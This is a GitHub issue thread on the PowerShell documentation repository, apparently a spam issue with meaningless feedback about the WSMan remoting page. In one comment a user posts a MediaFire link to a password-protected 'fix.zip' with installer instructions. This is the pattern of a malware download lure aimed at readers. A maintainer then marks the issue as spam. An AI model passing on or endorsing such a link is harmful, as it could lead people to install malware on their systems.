### ISSUE TITLE
control_your_temper

### ISSUE THREAD

**Issue by Princeprince559** [MicrosoftDocs/PowerShell-Docs#11360]
### Type of issue

Missing information

### Feedback

just_checking_ something_out_STB

### Page URL

https://learn.microsoft.com/en-us/powershell/scripting/security/remoting/wsman-remoting-in-powershell?view=powershell-7.4

### Content source URL

https://github.com/MicrosoftDocs/PowerShell-Docs/blob/main/reference/docs-conceptual/security/remoting/WSMan-Remoting-in-PowerShell.md

### Author

@sdwheeler

### Document Id

a5359ab6-83cb-1528-f7c1-ccac867a77da
```[tasklist]
### Tasks
- [ ] https://github.com/MicrosoftDocs/PowerShell-Docs/pull/11359
```

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sdwheeler** [comment]
This issue is spam and violates our [Code of Conduct](https://github.com/MicrosoftDocs/PowerShell-Docs/blob/main/CODE_OF_CONDUCT.md).
